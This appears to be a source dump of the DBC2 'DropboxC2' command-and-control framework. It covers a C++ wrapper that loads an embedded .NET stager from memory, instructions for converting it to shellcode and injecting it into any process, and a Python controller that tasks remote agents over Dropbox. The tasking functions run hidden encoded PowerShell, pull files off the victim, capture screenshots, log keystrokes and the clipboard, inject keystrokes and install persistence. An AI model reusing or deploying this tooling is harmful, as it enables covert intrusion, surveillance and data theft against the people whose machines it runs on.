System.CodeDom.Compiler.CompilerParameters $Parameters.CompilerOptions += "/unsafe" Add-Type -TypeDefinition $Source -Language CSharp -CompilerParameters $Parameters $FileData = Get-Content $File -Encoding Byte #$UserDataBytes = [system.Text.Encoding]::Default.GetBytes($UserData) # + "\0") $UserDataBytes = [system.Text.Encoding]::Unicode.GetBytes($UserData) # + "\0") # https://github.com/PowerShell/PowerShell/issues/3313 $UintHash = [System.Uint32][System.Convert]::ToUint32($FunctionHash.ToString("X8"), 16) [sRDI]::ConvertToShellcode($FileData, $UintHash, $UserDataBytes) } ================================================ FILE: dbc2Loader/nativeWrapper/dbc2LoaderWrapperCLR.cpp ================================================ /* Author: Arno0x0x, Twitter: @Arno0x0x =============================== HOW TO COMPILE =============================== => Requires VisualStudio ====== x86 (32 bits) DLL: 1/ First, run the following bat file: "c:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\vcvars32.bat" 2/ Then compile it using c:\> cl.exe /LD dbc2LoaderWrapperCLR.cpp /o release_x86\dbc2LoaderWrapperCLR_x86.dll ====== x64 (64 bits) DLL: 1/ First, run the following bat file: "C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\x86_amd64\vcvarsx86_amd64.bat" 2/ Then compile it using c:\> cl.exe /LD dbc2LoaderWrapperCLR.cpp /o release_x64\dbc2LoaderWrapperCLR_x64.dll =============================== HOW TO CONVERT TO SHELLCODE WITH sRDI =============================== Once compiled as DLL, you can use sRDI to transform this DLL into a shellcode. NB: You have to use a modified version of ConvertTo-Shellcode.ps1 to convert the supplied UserData to Unicode: -- $UserDataBytes = [system.Text.Encoding]::Default.GetBytes($UserData) # + "\0") ++ $UserDataBytes = [system.Text.Encoding]::Unicode.GetBytes($UserData) # + "\0") To get the shellcode as a binary file: c:\> powershell.exe PS c:\> ipmo ConvertTo-Shellcode.ps1 PS c:\> #x86 DLL PS c:\> ConvertTo-Shellcode -File release_x86\dbc2LoaderWrapperCLR_86.dll -UserData "" | Set-Content -Path dbc2LoaderWrapperCLR_x86.bin -Encoding Byte PS c:\> #x64 DLL PS c:\> ConvertTo-Shellcode -File release_x64\dbc2LoaderWrapperCLR_64.dll -UserData "" | Set-Content -Path dbc2LoaderWrapperCLR_x86.bin -Encoding Byte Example of injecting the shellcode: PS c:\> ipmo Invoke-Shellcode.ps1 PS c:\> Invoke-Shellcode -Shellcode (Get-Content .\dbc2LoaderWrapperCLR_x64.bin -Encoding byte) -ProcessID */ #pragma region Includes and Imports //#define WIN32_LEAN_AND_MEAN #include #include #include "tchar.h" #include "dbc2LoaderWrapperCLR.h" #include #pragma comment(lib, "mscoree.lib") // Import mscorlib.tlb (Microsoft Common Language Runtime Class Library). #import "mscorlib.tlb" raw_interfaces_only \ high_property_prefixes("_get","_put","_putref") \ rename("ReportEvent", "InteropServices_ReportEvent") using namespace mscorlib; #pragma endregion typedef HRESULT(WINAPI *funcCLRCreateInstance)( REFCLSID clsid, REFIID riid, LPVOID * ppInterface ); typedef HRESULT (WINAPI *funcCorBindToRuntime)( LPCWSTR pwszVersion, LPCWSTR pwszBuildFlavor, REFCLSID rclsid, REFIID riid, LPVOID* ppv); extern const unsigned int dbc2LoaderDLL_len; extern unsigned char dbc2LoaderDLL[]; void InvokeMethod(_TypePtr spType, wchar_t* method, wchar_t* command); //======================================================================================= // Creation of CLR //======================================================================================= bool createDotNetFourHost(HMODULE* hMscoree, const wchar_t* version, ICorRuntimeHost** ppCorRuntimeHost) { HRESULT hr = NULL; funcCLRCreateInstance pCLRCreateInstance = NULL; ICLRMetaHost *pMetaHost = NULL; ICLRRuntimeInfo *pRuntimeInfo = NULL; bool hostCreated = false; pCLRCreateInstance = (funcCLRCreateInstance)GetProcAddress(*hMscoree, "CLRCreateInstance"); if (pCLRCreateInstance == NULL) { wprintf(L"Could not find .NET 4.0 API CLRCreateInstance"); goto Cleanup; } hr = pCLRCreateInstance(CLSID_CLRMetaHost, IID_PPV_ARGS(&pMetaHost)); if (FAILED(hr)) { // Potentially fails on .NET 2.0/3.5 machines with E_NOTIMPL wprintf(L"CLRCreateInstance failed w/hr 0x%08lx\n", hr); goto Cleanup; } hr = pMetaHost->GetRuntime(L"v4.0.30319", IID_PPV_ARGS(&pRuntimeInfo)); if (FAILED(hr)) { wprintf(L"ICLRMetaHost::GetRuntime failed w/hr 0x%08lx\n", hr); goto Cleanup; } // Check if the specified runtime can be loaded into the process. BOOL loadable; hr = pRuntimeInfo->IsLoadable(&loadable); if (FAILED(hr)) { wprintf(L"ICLRRuntimeInfo::IsLoadable failed w/hr 0x%08lx\n", hr); goto Cleanup; } if (!loadable) { wprintf(L".NET runtime v4.0.30319 cannot be loaded\n"); goto Cleanup; } // Load the CLR into the current process and return a runtime interface hr = pRuntimeInfo->GetInterface(CLSID_CorRuntimeHost, IID_PPV_ARGS(ppCorRuntimeHost)); if (FAILED(hr)) { wprintf(L"ICLRRuntimeInfo::GetInterface failed w/hr 0x%08lx\n", hr); goto Cleanup; } hostCreated = true; Cleanup: if (pMetaHost) { pMetaHost->Release(); pMetaHost = NULL; } if (pRuntimeInfo) { pRuntimeInfo->Release(); pRuntimeInfo = NULL; } return hostCreated; } HRESULT createDotNetTwoHost(HMODULE* hMscoree, const wchar_t* version, ICorRuntimeHost** ppCorRuntimeHost) { HRESULT hr = NULL; bool hostCreated = false; funcCorBindToRuntime pCorBindToRuntime = NULL; pCorBindToRuntime = (funcCorBindToRuntime)GetProcAddress(*hMscoree, "CorBindToRuntime"); if (!pCorBindToRuntime) { wprintf(L"Could not find API CorBindToRuntime"); goto Cleanup; } hr = pCorBindToRuntime(version, L"wks", CLSID_CorRuntimeHost, IID_PPV_ARGS(ppCorRuntimeHost)); if (FAILED(hr)) { wprintf(L"CorBindToRuntime failed w/hr 0x%08lx\n", hr); goto Cleanup; } hostCreated = true; Cleanup: return hostCreated; } HRESULT createHost(const wchar_t* version, ICorRuntimeHost** ppCorRuntimeHost) { bool hostCreated = false; HMODULE hMscoree = LoadLibrary("mscoree.dll"); if (hMscoree) { if (createDotNetFourHost(&hMscoree, version, ppCorRuntimeHost) || createDotNetTwoHost(&hMscoree, version, ppCorRuntimeHost)) { hostCreated = true; } } return hostCreated; } //======================================================================================= // Exported function // The passed arguments are passed to the 'dbc2loader.dbc2loader.entryPoint' function //======================================================================================= extern "C" __declspec(dllexport) int Dbc2Loader(wchar_t* argument) { //Debug //MessageBoxW(NULL,argument,L"Debug",0); //wprintf(argument); HRESULT hr; ICorRuntimeHost *pCorRuntimeHost = NULL; IUnknownPtr spAppDomainThunk = NULL; _AppDomainPtr spDefaultAppDomain = NULL; // The .NET assembly to load. bstr_t bstrAssemblyName("dbc2Loader"); _AssemblyPtr spAssembly = NULL; // The .NET class to instantiate. bstr_t bstrClassName("dbc2Loader.dbc2Loader"); _TypePtr spType = NULL; // Create the runtime host if (!createHost(L"v4.0.30319", &pCorRuntimeHost)) { wprintf(L"Failed to create the runtime host\n"); goto Cleanup; } // Start the CLR hr = pCorRuntimeHost->Start(); if (FAILED(hr)) { wprintf(L"CLR failed to start w/hr 0x%08lx\n", hr); goto Cleanup; } DWORD appDomainId = NULL; hr = pCorRuntimeHost->GetDefaultDomain(&spAppDomainThunk); if (FAILED(hr)) { wprintf(L"RuntimeClrHost::GetCurrentAppDomainId failed w/hr 0x%08lx\n", hr); goto Cleanup; } // Get a pointer to the default AppDomain in the CLR. hr = pCorRuntimeHost->GetDefaultDomain(&spAppDomainThunk); if (FAILED(hr)) { wprintf(L"ICorRuntimeHost::GetDefaultDomain failed w/hr 0x%08lx\n", hr); goto Cleanup; } hr = spAppDomainThunk->QueryInterface(IID_PPV_ARGS(&spDefaultAppDomain)); if (FAILED(hr)) { wprintf(L"Failed to get default AppDomain w/hr 0x%08lx\n", hr); goto Cleanup; } // Load the assembly from memory SAFEARRAYBOUND bounds[1]; bounds[0].cElements = dbc2LoaderDLL_len; bounds[0].lLbound = 0; SAFEARRAY* arr = SafeArrayCreate(VT_UI1, 1, bounds); SafeArrayLock(arr); memcpy(arr->pvData, dbc2LoaderDLL, dbc2LoaderDLL_len); SafeArrayUnlock(arr); hr = spDefaultAppDomain->Load_3(arr, &spAssembly); if (FAILED(hr)) { wprintf(L"Failed to load the assembly w/hr 0x%08lx\n", hr); goto Cleanup; } // Get the Type of PowerShellRunner. hr = spAssembly->GetType_2(bstrClassName, &spType); if (FAILED(hr)) { wprintf(L"Failed to get the Type interface w/hr 0x%08lx\n", hr); goto Cleanup; } // Call the static method of the class InvokeMethod(spType, L"entryPoint", argument); Cleanup: if (pCorRuntimeHost) { pCorRuntimeHost->Release(); pCorRuntimeHost = NULL; } return 0; } void InvokeMethod(_TypePtr spType, wchar_t* method, wchar_t* command) { HRESULT hr; bstr_t bstrStaticMethodName(method); SAFEARRAY *psaStaticMethodArgs = NULL; variant_t vtStringArg(command); variant_t vtPSEntryPointReturnVal; variant_t vtEmpty; psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 1); LONG index = 0; hr = SafeArrayPutElement(psaStaticMethodArgs, &index, &vtStringArg); if (FAILED(hr)) { wprintf(L"SafeArrayPutElement failed w/hr 0x%08lx\n", hr); return; } // Invoke the method from the Type interface. hr = spType->InvokeMember_3( bstrStaticMethodName, static_cast(BindingFlags_InvokeMethod | BindingFlags_Static | BindingFlags_Public), NULL, vtEmpty, psaStaticMethodArgs, &vtPSEntryPointReturnVal); if (FAILED(hr)) { wprintf(L"Failed to invoke dbc2Loader.dbc2Loader.entryPoint w/hr 0x%08lx\n", hr); return; } SafeArrayDestroy(psaStaticMethodArgs); psaStaticMethodArgs = NULL; } //======================================================================================= // DllMain //======================================================================================= BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } ================================================ FILE: dbc2Loader/nativeWrapper/dbc2LoaderWrapperCLR.h ================================================ #ifndef NATIVEDLLHOSTCLRDLL_H_ #define NATIVEDLLHOSTCLRDLL_H_ // extern "C" required to avoid name mangling by C++ compiler extern "C" __declspec(dllexport) int Dbc2Loader(wchar_t* argument); // This is the dbc2Loader.dll managed DLL represented as an array of bytes (use my tool "transformFile.py -i dbc2Loader.dll -f cpp") unsigned char dbc2LoaderDLL[] = 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const unsigned int dbc2LoaderDLL_len = 4608; #endif ================================================ FILE: dbc2Loader/nativeWrapper/readme.md ================================================ nativeWrapper ============ **dbc2LoaderWrapperCLR** is a unamanaged DLL that loads the .Net CLR in memory at runtime, then loads the dbc2Loader .Net assembly from memory and finally invoke a dbc2Loader specific method (*to match a specific function prototype required by InvokeMember_3 method*). The dbc2Loader assembly is hardcoded as an array of bytes in the `dbc2LoaderWrapperCLR.h` file. The sole purpose of this DLL is to get a unmanaged DLL hosting the dbc2Loader .Net assembly in order to be later converted into position independant shellcode through the use of sRDI (https://github.com/monoxgas/sRDI). How to compile the nativeWrapper DLL ---------------- You'll need Visual Studio (express is ok as well): ``` ====== x86 (32 bits) DLL: 1/ First, run the following bat file: "c:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\vcvars32.bat" 2/ Then compile it using c:\> cl.exe /LD dbc2LoaderWrapperCLR.cpp /o release_x86\dbc2LoaderWrapperCLR_x86.dll ====== x64 (64 bits) DLL: 1/ First, run the following bat file: "C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\x86_amd64\vcvarsx86_amd64.bat" 2/ Then compile it using c:\> cl.exe /LD dbc2LoaderWrapperCLR.cpp /o release_x64\dbc2LoaderWrapperCLR_x64.dll ``` How to convert the DLL to shellcode with sRDI ---------------- You'll have to use a slightly modified version of the powershell `ConvertTo-Shellcode.ps1` script that is provided in this repository. You'll need the x86 and/or x64 compiled nativeWrapper.dll file. Then use the powershell script like this: ``` c:\> powershell.exe PS c:\> ipmo ConvertTo-Shellcode.ps1 PS c:\> #x86 DLL PS c:\> ConvertTo-Shellcode -File release_x86\dbc2LoaderWrapperCLR_86.dll -UserData "" | Set-Content -Path dbc2LoaderWrapperCLR_x86.bin -Encoding Byte PS c:\> #x64 DLL PS c:\> ConvertTo-Shellcode -File release_x64\dbc2LoaderWrapperCLR_64.dll -UserData "" | Set-Content -Path dbc2LoaderWrapperCLR_x86.bin -Encoding Byte ``` **IMPORTANT**: Using the ConvertTo-Shellcode.ps1 script, it is important to note that the dbc2Loader parameters must be passed in one single string with a `!` separator, like for instance: `https://dropbox.com/path_to_dbc2_agent!xorkey!accessToken!masterkey` Those parameters are just like to one you would find in any other DBC2 stager. The resulting bin file are the shellcode that you're free to inject in any process using your prefered method. Have fun ! Credits ------------- Lee Christensen for creating and hosting the CLR in native code, then loading and executing a .Net assembly https://github.com/leechristensen/UnmanagedPowerShell Nick Landers for sRDI, used for transforming a native DLL to position independant shellcode https://github.com/monoxgas/sRDI ================================================ FILE: dbc2Loader/readme.md ================================================ dbc2Loader ============ **dbc2Loader** is a small .Net assembly that acts as a lightweight and simple wrapper for the DBC2 agent, performing the following tasks: 1. Download the DBC2 agent assembly from a remote URL (*normally a dropbox URL of the published stage obtained from the DBC2 controller*) 2. Decrypt the DBC2 agent assembly in memory 3. Load the DBC2 agent assembly in memory 4. Instantiate the DBC2 agent It is currently useful for two things: 1/ It can be loaded through DotNetToJScript, which gives us a new JScript loader for the DBC2 agent: javascript2 stager which already contains the dbc2Loader.dll serialized object (*so you don't have to compile it on your own*). 2/ Can be loaded through the use of a native wrapper DLL hosting the .Net CLR (*also provided in the ./nativeWrapper directory*), then this native wrapper DLL can be transformed into a position independant shellcode thanks to sRDI. This allows for injecting the DBC2 agent in virtually any process !! Be sure to check instructions in the nativeWrapper CPP file header on how to compile, transform with sRDI and use it ! ================================================ FILE: dropboxC2.py ================================================ #!/usr/bin/python # -*- coding: utf8 -*- # # Author: Arno0x0x - https://twitter.com/Arno0x0x # # This tool is distributed under the terms of the [GPLv3 licence](http://www.gnu.org/copyleft/gpl.html) """ The main controller for the DropboxC2 agents. """ import config as cfg import getpass import pyscrypt import os from lib import helpers from lib import console from lib import dropboxHandler from lib import statusHandler from lib import mainHandler from lib import agentHandler from lib import pollingThread # make version and author for DropboxC2 VERSION = "0.2.4" AUTHOR = "Arno0x0x - https://twitter.com/Arno0x0x" #**************************************************************************************** # MAIN Program #**************************************************************************************** if __name__ == '__main__': helpers.printBanner() print helpers.color("[*] DropboxC2 controller - Author: {} - Version {}".format(AUTHOR, VERSION)) #------------------------------------------------------------------------------ # An access token is required to access the Dropbox API. If none is provided in the config file, ask the user to provide one if not hasattr(cfg, 'defaultAccessToken'): accessToken = "" else: accessToken = cfg.defaultAccessToken if accessToken is "": while True: accessToken = raw_input("[SETUP] Enter your Dropbox API access token: ") if accessToken == "": print helpers.color("[!] You must specify a Dropbox API access token. It is a mandatory settings") else: break else: print helpers.color("[*][CONFIG] Using Dropbox API access token from configuration file") #------------------------------------------------------------------------------ # A master crypto key is required to perform end-to-end encryption of all data exchanged between the agent and the controller. # The master crypto key is derived from a user provided password. # If no master crypto key is found in the config file, ask the user to provide a password and derive the key from it if not hasattr(cfg, 'defaultMasterKey'): masterKey = "" else: masterKey = cfg.defaultMasterKey if masterKey is "": while True: password = getpass.getpass("[SETUP] Enter the master password used to encrypt all data between the agents and the controler: ") if password == "": print helpers.color("[!] You must specify a master password. It is a mandatory settings") else: # Derive a 16 bytes (128 bits) master key from the provided password masterKey = pyscrypt.hash(password, "saltmegood", 1024, 1, 1, 16) print helpers.color("[+] Derived master key from password: [{}]\nYou can save it in the config file to reuse it automatically next time".format(helpers.b64encode(masterKey))) break else: masterKey = helpers.b64decode(masterKey) print helpers.color("[*][CONFIG] Using master key from configuration file") #------------------------------------------------------------------------------ # Check that required directories and path are available, if not create them if not os.path.isdir(cfg.defaultPath['incoming']): os.makedirs(cfg.defaultPath['incoming']) print helpers.color("[+] Creating [{}] directory for incoming files".format(cfg.defaultPath['incoming'])) #------------------------------------------------------------------------------ # Create a dropbox handler dropboxHandler = dropboxHandler.DropboxHandler(accessToken) # Create a status handler statusHandler = statusHandler.StatusHandler(masterKey) # Create a mainHandler mainHandler = mainHandler.MainHandler(dropboxHandler, statusHandler) # Create an AgentHandler agentHandler = agentHandler.AgentHandler(dropboxHandler, statusHandler) # Start the main background polling thread print helpers.color("[*] Starting Polling thread") pollingThread = pollingThread.PollingThread(dropboxHandler, statusHandler) pollingThread.doPoll() # Print the list of discoverd agents helpers.printAgentList(statusHandler.agentList) #-------------------------------------------------------------------------- # Main command loop #-------------------------------------------------------------------------- mainMenu = console.MainMenu(mainHandler, agentHandler, statusHandler) while True: try: mainMenu.cmdloop() #---------------------------------------------------------------------- # handle ctrl+c's except KeyboardInterrupt as e: try: choice = raw_input(helpers.color("\n[>] Exit? [y/N] ", "red")) if choice.lower() != "" and choice.lower()[0] == "y": pollingThread.stopPollingThread() print helpers.color("[>] Stopping polling thread. Please wait...","red") quit() else: continue except KeyboardInterrupt as e: continue ================================================ FILE: lib/__init__.py ================================================ ================================================ FILE: lib/agentHandler.py ================================================ # -*- coding: utf8 -*- import config as cfg from lib import helpers from lib import stagers from lib.crypto import Crypto import os.path #**************************************************************************************** # Class handling high level interactions with agents #**************************************************************************************** class AgentHandler: """ This class provides all functions to task remote agents """ #------------------------------------------------------------------------------------ def __init__(self, dropboxHandler, statusHandler): self.dropboxHandler = dropboxHandler self.statusHandler = statusHandler self.agentID = None #------------------------------------------------------------------------------------ def taskAgentWithCLI(self, cmd): # Create a task task = self.statusHandler.createTask(self.agentID, "runCLI", args = [cmd]) # Prepare the task format, then put the task into the command file data = "runCLI\n{}\n{}\n{}".format(task['id'], cmd, helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithShell(self, cmd): # Prepare the task format, then put the task into the command file data = "shell\n{}\n{}\n{}".format("n/a",cmd,helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: print helpers.color("[+] Agent with ID [{}] has been tasked with shell command".format(self.agentID)) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithRunPSModule(self, moduleName, moduleArgs=None, interact = False): # Construct the powershell code from a template, substituting palceholders with proper parameters xorKey = Crypto.convertKey(self.statusHandler.masterKey, outputFormat = "sha256") parameters = {'xorKey': xorKey, 'moduleURL': self.statusHandler.publishedModuleList[moduleName]} poshCmd = helpers.convertFromTemplate(parameters, cfg.defaultPath['runPSModuleTpl']) if poshCmd == None: return # Add module arguments if ever if moduleArgs: poshCmd += ";Write-Host \"-> Executing module arguments\";{}".format(moduleArgs) # If we want to interact with the PowerShell CLI once the module is loaded, switch to 'shell' mode if interact: self.taskAgentWithShell(poshCmd) else: task = self.statusHandler.createTask(self.agentID, "runPSModule", args = [moduleName, moduleArgs]) # Turn the powershell code into a suitable powershell base64 encoded one line command base64Payload = helpers.powershellEncode(poshCmd) # Create the final command cmd = "powershell.exe -NoP -sta -NonI -W Hidden -Enc {}".format(base64Payload) # Prepare the task format, then put the task into the command file data = "runCLI\n{}\n{}\n{}".format(task['id'],cmd,helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithLaunchProcess(self, exePath, parameters): # Create a task task = self.statusHandler.createTask(self.agentID, "launchProcess", args = [exePath, parameters]) # Prepare the task format, then put the task into the command file data = "launchProcess\n{}\n{}\n{}\n{}".format(task['id'],exePath, parameters,helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithSendFile(self, localFile, destinationPath): # Creating the remote file path (used on the DropBox API server) fileName = os.path.basename(localFile) remoteFilePath = "/" + self.agentID + ".rsc" # First upload the localFile to DropBox try: with open(localFile) as fileHandle: print helpers.color("[*] Uploading file [{}] to [{}]".format(localFile, remoteFilePath)) r = self.dropboxHandler.putFile(remoteFilePath, fileHandle.read()) fileHandle.close() if r is None: return except IOError: print helpers.color("[!] Could not open or read file [{}]".format(localFile)) return # Once the local file is properly uploaded, proceed with tasking the agent # Create a task task = self.statusHandler.createTask(self.agentID, "sendFile", args = [localFile, destinationPath]) # Prepare the task format, then put the task into the command file data = "downloadFile\n{}\n{}\n{}\n{}\n{}".format(task['id'], remoteFilePath, destinationPath, fileName, helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithGetFile(self, agentLocalFile): # Create a task task = self.statusHandler.createTask(self.agentID, "getFile", args = [agentLocalFile]) # Prepare the task format, then put the task into the command file data = "sendFile\n{}\n{}\n{}".format(task['id'], agentLocalFile, helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithSleep(self, sleepAmount): # Create a task task = self.statusHandler.createTask(self.agentID, "sleep", args = [str(sleepAmount)]) # Prepare the task format, then put the task into the command file data = "sleep\n{}\n{}\n{}".format(task['id'], sleepAmount, helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithNewPolling(self, period, deviation): # Create a task task = self.statusHandler.createTask(self.agentID, "polling", args = [str(period), str(deviation)]) # Prepare the task format, then put the task into the command file data = "polling\n{}\n{}\n{}".format(task['id'], period, deviation, helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithScreenshot(self): # Create a task task = self.statusHandler.createTask(self.agentID, "screenshot") # Prepare the task format, then put the task into the command file data = "screenshot\n{}\n{}".format(task['id'], helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithKeylogger(self, action): # Create a task task = self.statusHandler.createTask(self.agentID, "keylogger", args = [action]) # Prepare the task format, then put the task into the command file data = "keylogger\n{}\n{}\n{}".format(task['id'], action, helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithClipboardLogger(self, action): # Create a task task = self.statusHandler.createTask(self.agentID, "clipboardlogger", args = [action]) # Prepare the task format, then put the task into the command file data = "clipboardlogger\n{}\n{}\n{}".format(task['id'], action, helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithSendKeystrokes(self, procName, keyStrokes): # Create a task task = self.statusHandler.createTask(self.agentID, "sendkeystrokes", args = [procName, keyStrokes]) # Prepare the task format, then put the task into the command file data = "sendkeystrokes\n{}\n{}\n{}\n{}".format(task['id'], procName, keyStrokes, helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithPersist(self): # Create a task task = self.statusHandler.createTask(self.agentID, "persist") # Prepare the task format, then put the task into the command file data = "persist\n{}\n{}".format(task['id'], helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) #------------------------------------------------------------------------------------ def taskAgentWithStop(self): # Create a task task = self.statusHandler.createTask(self.agentID, "stop") # Prepare the task format, then put the task into the command file data = "stop\n{}\n{}".format(task['id'], helpers.randomString(16)) r = self.dropboxHandler.putFile(self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color("[+] Agent with ID [{}] has been tasked with task ID [{}]".format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format(self.agentID)) ================================================ FILE: lib/console.py ================================================ # -*- coding: utf8 -*- import config as cfg from lib import helpers import readline import cmd import os.path from sys import platform as _platform # Fix OSX platform bug with readline library if _platform == "darwin": import readline #import rlcompleter if 'libedit' in readline.__doc__: readline.parse_and_bind("bind ^I rl_complete") else: readline.parse_and_bind("tab: complete") # Fix the use of the "-" as a delimiter old_delims = readline.get_completer_delims() readline.set_completer_delims(old_delims.replace('-', '')) #**************************************************************************************** # Class handling console main menu interactions #**************************************************************************************** class MainMenu(cmd.Cmd): #------------------------------------------------------------------------------------ def __init__(self, mainHandler, agentHandler, statusHandler): cmd.Cmd.__init__(self) self.mainHandler = mainHandler self.agentHandler = agentHandler self.statusHandler = statusHandler self.prompt = "[main]#> " #------------------------------------------------------------------------------------ def do_shell(self, args): """shell \nor\n! \nExecute a shell command on the local system""" os.system(args) #------------------------------------------------------------------------------------ def do_list(self, args): """Show the list of all discovered agents with their current status""" helpers.printAgentList(self.statusHandler.agentList) #------------------------------------------------------------------------------------ def do_listPublishedStage(self, args): """Show the list of all published stages with their public link""" helpers.printStageList(self.statusHandler.publishedStageList) #------------------------------------------------------------------------------------ def do_listPublishedModules(self, args): """Show the list of all published modules with their public link""" helpers.printModuleList(self.statusHandler.publishedModuleList) #------------------------------------------------------------------------------------ def do_use(self, args): """use \nSelect the current agent to work with. Must be an ACTIVE or SLEEPING agent""" # Checking args if not args: print helpers.color("[!] Please specify an agent ID. Command format: use ") return agentID = args.split()[0] if self.statusHandler.agentIsKnown(agentID): if self.statusHandler.agentIsDead(agentID): print helpers.color("[!] Cannot use a 'DEAD' agent. Check for ALIVE or SLEEPING agent using the 'list' command") return print helpers.color("[*] Using agent ID [{}]".format(agentID)) self.agentHandler.agentID = agentID agentMenu = AgentMenu(self.agentHandler, self.statusHandler) agentMenu.cmdloop() else: print helpers.color("[!] Unkown agent ID [{}]".format(agentID)) #------------------------------------------------------------------------------------ def complete_use(self, text, line, startidx, endidx): return [agentID for agentID in self.statusHandler.agentList if self.statusHandler.agentIsAlive(agentID) and agentID.startswith(text)] 